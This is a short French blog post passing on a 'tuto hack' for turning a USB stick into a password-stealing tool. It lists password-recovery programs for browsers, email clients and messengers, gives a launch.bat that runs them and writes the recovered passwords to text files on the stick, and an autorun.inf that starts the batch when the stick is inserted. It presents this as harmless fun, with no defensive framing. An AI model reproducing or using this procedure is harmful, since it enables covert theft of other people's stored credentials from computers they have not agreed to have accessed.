Création d’une clé USB rootkit !
Un tuto découvert aujourd’hui sur ce site sympa qu’est www.funinformatique.com, comment se servir d’un support USB pour récupérer des informations sur le poste sur lequel il sera connecté !!!
Il s’agit d’un petit « tuto hack » fun et original, à tester bien sur ^^
La création du rootkit (définition wikipédia : « Un ensemble de techniques mises en œuvre par un ou plusieurs logiciels, dont le but est d’obtenir et de pérenniser un accès (généralement non autorisé) à un ordinateur de la manière la plus furtive possible »), nécessite quelques étapes très simples :
I – Télécharger les softs de déchiffrement des mots de passe des applications basiques
- WebBrowserPassView : Internet Explorer, Firefox, Chrome, Safari, Opera
- Mail PassView – Recover the passwords of popular email clients : Outlook Express, MS Outlook, Eudora, Mozilla Thunderbird , et d’autres…
- MessenPass – Recover the passwords of instant messenger programs : Yahoo Messenger, MSN Messenger, Trillian, et d’autres…
- Dialupass: Dialup Password Recovery : VPN et Internet connections
- Asterisk Logger : Affiche les valeurs cachées par les ‘****’
- SniffPass – Password Sniffer : Capture les mots de passe via POP3, IMAP4, SMTP, FTP, et HTTP
- PstPassword : Outlook .PST.
- Protected Storage PassView
II – Créer un fichier launch.bat qui va ouvrir les programmes de récupération de mot de passe et stocker les résultats dans un fichier texte.
Pour cela, il faut créer un nouveau document texte et y écrire le code ci-dessous :
- start mspass.exe /stext dossier1/mspass.txt
- start mailpv.exe /stext dossier/mailpv.txt
- start pspv.exe /stext dossier1/pspv.txt
- start iepv.exe /stext dossier1/iepv.txt
- start PasswordFox.exe /stext dossier1/PasswordFox.txt
- start ChromePass.exe /stext dossier1/ChromePass.txt
Attention a bien vérifier que les noms de fichiers correspondent bien aux noms de launch.bat.
Il faudra également créer le dossier dans lequel seront stockés les fichiers d’export (ici « dossier1 »).
III – Création d’un fichier autorun.inf
Ce menu apparaîtra dans la fenêtre des actions disponibles à l’insertion de votre support USB.
Pour cela, il faut créer un nouveau document texte et y écrire le code ci-dessous :
- [autorun]
- open=launch.bat
- ACTION= »Le nom de la nouvelle option »
C’est fini ! Amusez-vous en variant les logiciels embarqués 😀